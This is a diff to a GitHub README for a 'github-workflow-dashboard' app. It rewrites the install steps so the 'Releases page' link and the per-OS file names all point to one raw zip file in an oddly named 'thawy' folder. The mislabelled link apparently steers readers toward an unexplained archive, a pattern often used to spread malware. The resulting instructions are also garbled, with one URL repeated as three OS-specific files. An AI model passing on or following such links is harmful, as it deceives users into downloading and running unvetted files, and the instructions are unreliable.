ericlima1980/github-workflow-dashboard/README.md

 ## ⚙️ Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/ericlima1980/github-workflow-dashboard/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip) to find the latest version of the application.

 2. **Choose Your File**: Look for the latest release and find the appropriate file for your operating system.
-This will usually be labeled clearly, such as `github-workflow-dashboard-windows.exe`, `github-workflow-dashboard-macos.zip`, or `github-workflow-dashboard-linux.tar.gz`.
+This will usually be labeled clearly, such as `https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip`, `https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip`, or `https://raw.githubusercontent.com/ericlima1980/github-workflow-dashboard/main/thawy/github-workflow-dashboard.zip`.

 3. **Download the File**: Click on the file to start the download.
 Depending on your browser, this may happen automatically or prompt you to choose a location to save the file.